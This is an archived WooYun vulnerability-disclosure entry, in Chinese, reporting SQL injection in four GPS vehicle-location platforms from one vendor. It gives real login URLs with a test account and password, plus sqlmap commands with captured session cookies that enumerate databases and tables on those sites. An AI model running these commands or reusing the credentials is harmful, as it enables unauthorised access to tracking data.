乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-27: 细节已通知厂商并且等待厂商处理中 2015-08-30: 厂商已经确认,细节仅向厂商公开 2015-09-09: 细节向核心白帽子及相关领域专家公开 2015-09-19: 细节向普通白帽子公开 2015-09-29: 细节向实习白帽子公开 2015-10-14: 细节向公众公开
某位置信息服务管理平台测试账号登录SQL注射(4个平台&24个库&sa账户最高权限)
http://www.gps199.com/login.aspx 账号:test密码:123456http://www.szpswl.com/Login.aspx账号:test密码:123456http://www.gpscx.com/index.aspx账号:test密码:123456http://its666.com/此平台无测试账号,与前面三个为同一个供应商,应该也存在此漏洞
漏洞注入点均为车辆信息详细页面:
http://www.szpswl.com/Functions/data/detailCarInfo.aspx?id=105337
sqlmap.py -u "http://www.gps199.cn/Functions/data/detailCarInfo.aspx?id=105337" --technique E --dbs --cookie "ASP.NET_SessionId=04gtsl35gx43z4exso2j5zu1; GPS_CheckCode_Cookies=5724; .ASPXAUTH=CB877614CCA750A07F3F548411A9CB225BAFFE5A631CF3978D754807765199C1FBAF7B0EAC194974F26DB5A05FAA5F0345F543C1EA7678E2347309670F7280A7DEDECC3E7AAE000641540E4164B773D5E888058BAC733E696607853563EAF92E35BBF36FA224FDDABEBC799E2F223BFF926A1CD8; GPS_UserName_Cookies=test; CookiesGPSMonitor=Public_UnOnline_Cookies=2015%2f8%2f25+9%3a48%3a23&Public_TreeShowTime_Cookies=1; CookiesMain=Public_CompanyID_Cookies=1530"
sqlmap.py -u "http://www.gpscx.com/Functions/data/detailCarInfo.aspx?id=105377" --users --cookie "ASP.NET_SessionId=ngmmeb55u2o3dg55iwnhizbw; GPS_CheckCode_Cookies=9841; pgv_pvi=4263078912; pgv_si=s768238592; 4006788200slid=slid_352_13%7C; 4006788200mid=545_2; 4006788200mh=1440469736582; 4006788200msg=%u60A8%u597D%uFF0C%u8BF7%u95EE%u6709%u4EC0%u4E48%u53EF%u4EE5%u5E2E%u5230%u60A8%uFF1F%u8BF7%u63A5%u53D7%u804A%u5929%u9080%u8BF7%u3002; 4006788200ik=0; 4006788200is=2; .ASPXAUTH=DC1B908862B0927E69F3AF39567C2FD9DF40C3A64025F50F1A6087796007991F2A0F379EB2CFE5068C5A847C29DEAD9A9A9768F3502490DD6126C8425B898C78FC7DAAE7F5A9BDA65FE18EBD42E83D400354075647410CAFC5AD3E5A3AB5DC497B8EFAB34246D1EFA09BC93969CF5B1363610F97; GPS_UserName_Cookies=test; CookiesGPSMonitor=Public_UnOnline_Cookies=2015%2f8%2f25+10%3a34%3a05&Public_TreeShowTime_Cookies=1; CookiesMain=Public_CompanyID_Cookies=1530; CookiesReport=ASPXAUTHD2=ASPXAUTHD&Cookie_ClientHeight=448
sqlmap.py -u "http://www.gpscx.com/Functions/data/detailCarInfo.aspx?id=105377" -table -D GPSDB_Base --cookie "ASP.NET_SessionId=ngmmeb55u2o3dg55iwnhizbw; GPS_CheckCode_Cookies=9841; pgv_pvi=4263078912; pgv_si=s768238592; 4006788200slid=slid_352_13%7C; 4006788200mid=545_2; 4006788200mh=1440469736582; 4006788200msg=%u60A8%u597D%uFF0C%u8BF7%u95EE%u6709%u4EC0%u4E48%u53EF%u4EE5%u5E2E%u5230%u60A8%uFF1F%u8BF7%u63A5%u53D7%u804A%u5929%u9080%u8BF7%u3002; 4006788200ik=0; 4006788200is=2; .ASPXAUTH=DC1B908862B0927E69F3AF39567C2FD9DF40C3A64025F50F1A6087796007991F2A0F379EB2CFE5068C5A847C29DEAD9A9A9768F3502490DD6126C8425B898C78FC7DAAE7F5A9BDA65FE18EBD42E83D400354075647410CAFC5AD3E5A3AB5DC497B8EFAB34246D1EFA09BC93969CF5B1363610F97; GPS_UserName_Cookies=test; CookiesGPSMonitor=Public_UnOnline_Cookies=2015%2f8%2f25+10%3a34%3a05&Public_TreeShowTime_Cookies=1; CookiesMain=Public_CompanyID_Cookies=1530; CookiesReport=ASPXAUTHD2=ASPXAUTHD&Cookie_ClientHeight=448
过滤特殊字符
危害等级:高
漏洞Rank:12
确认时间:2015-08-30 07:16
暂未能确认软件生产厂商同时未建立与网站管理单位的直接处置渠道,待认领.
暂无